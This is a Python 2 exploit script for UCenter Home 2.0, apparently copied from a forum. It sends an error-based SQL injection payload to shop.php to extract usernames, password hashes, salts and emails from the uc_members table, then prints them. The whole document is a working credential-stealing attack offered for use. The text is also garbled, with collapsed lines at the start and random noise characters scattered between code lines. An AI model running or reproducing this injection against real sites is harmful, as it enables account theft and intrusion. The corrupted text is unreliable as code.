#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl2 B/ R; K2 l S. v$ k9 n6 x
! S* }. }- K, d! \
% [; s& P, W# F0 v
#!/usr/bin/env python
5 J" O: E- x( ]& b1 r: I
* F, o, u* [9 k+ _. X9 i G1 bimport sys
( F- [9 p/ `& A+ L2 J& O, B# ^import urllib2 & m; ] a! R6 ]% P9 T! ~2 d
import re
( E' W" h2 Y u9 Q: I 1 p& W6 t8 ]* D( n$ I% ?0 L+ s
def info():
5 e8 \- L6 T7 W4 R print 'From:http://www.exploit-db.com/exploits/14997/' x" a' O/ @- ^
print 'http://www.hake.cc/Web_loudong/' 8 @ b$ c) W# u4 p5 }' X; Q$ m
print 'changed:qiaoy'
. N! K" |8 \2 W: U+ w/ ? print 'exp:'
( d1 M4 z; Z- M9 q1 t( f print ' ./UCenter_Home_2.0.py site'
6 `% _: [4 D" m' P+ B ( Y) K% [3 V- i5 C
def main(): 6 m; ?5 D0 c6 F# }/ N
if len(sys.argv) != 2:
! L+ v2 H+ n& E+ l9 p2 z' S info() ; w. H! E8 Z7 E* Y
else: + d+ G9 s q% _' |3 N
site = sys.argv[1] h, e" p6 h; a9 h& q
if site[0:7] == 'http://': ' U' e4 X4 _6 T& j
sitesite =site
5 |1 [( L |' [! A7 e6 ~9 T J elif site[0:8] == 'https://':
: ]2 F) ]$ C% [1 z sitesite = site
% H4 c, J1 u; d0 O# K& I. C' K0 ` else: , o) K: v8 e1 Y& }; p4 S- Z( [) u
site = 'http://'+site # m3 Z* D( z4 c; \1 \8 G$ `9 V% j! |/ J
try:
. M0 |# t* T2 v: C# x' w- { url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
! Z' H I8 |5 x! i. A0 c Value = urllib2.urlopen(url).read()
( N4 ]/ c& K+ a1 S Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
8 N. [. }8 d* | hacked = Msg.split(':') 6 F' e+ l" [5 ]: \
print 'Name: '+hacked[1] ' ~9 n5 m4 h2 ^" m8 F8 u8 R
print 'Passwd: '+hacked[2] - H" w% f; o' r, x' @, _
print 'salt: '+hacked[3] 6 t+ k3 |+ p8 i' @* I; N
print 'email: '+hacked[4] ! H; @ N g- {9 n3 X
except:
' c# ?. p9 g( ]3 t6 l) @7 V6 G2 V( f; f print 'Sorry,I can\'t work............' ' @& A+ Q% {4 |
N. H* f R# a4 p3 D) Z
if __name__ == '__main__':
: o+ G8 h4 |. b* y- I% b- e( _ main() |